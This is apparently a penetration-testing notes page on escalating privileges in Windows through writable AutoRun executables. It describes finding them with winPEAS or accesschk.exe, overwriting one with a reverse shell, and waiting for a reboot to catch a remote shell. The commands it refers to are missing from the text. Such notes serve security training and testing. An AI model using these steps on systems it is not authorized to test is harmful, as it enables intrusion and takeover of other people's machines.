AutoRuns
Last updated
Last updated
Windows can be configured to run commands at startup, with elevated privileges. These βAutoRunsβ are configured in the Registry. If you are able to write to an AutoRun executable, and are able to restart the system (or wait for it to be restarted) you may be able to escalate privileges.
Use winPEAS to check for writable AutoRun executables:
Alternatively, we could manually enumerate the AutoRun executables:
and then use accesschk.exe to verify the permissions on each one:
The βC:\Program Files\Autorun Program\program.exeβ AutoRun executable is writable by Everyone. Create a backup of the original:
Copy our reverse shell executable to overwrite the AutoRun executable:
now start a listener on attacker machine and wait for the system to reboot, the autorun task will start and you will get a remote shell.